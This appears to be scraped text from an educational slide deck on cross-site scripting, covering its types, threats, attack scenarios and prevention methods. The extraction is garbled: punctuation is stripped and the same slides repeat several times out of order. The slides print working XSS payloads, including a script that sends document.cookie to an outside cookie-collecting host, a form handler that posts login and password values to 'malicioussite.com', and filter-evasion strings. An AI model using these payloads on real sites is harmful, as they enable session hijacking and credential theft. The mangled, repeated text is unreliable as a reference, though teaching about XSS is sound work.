ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
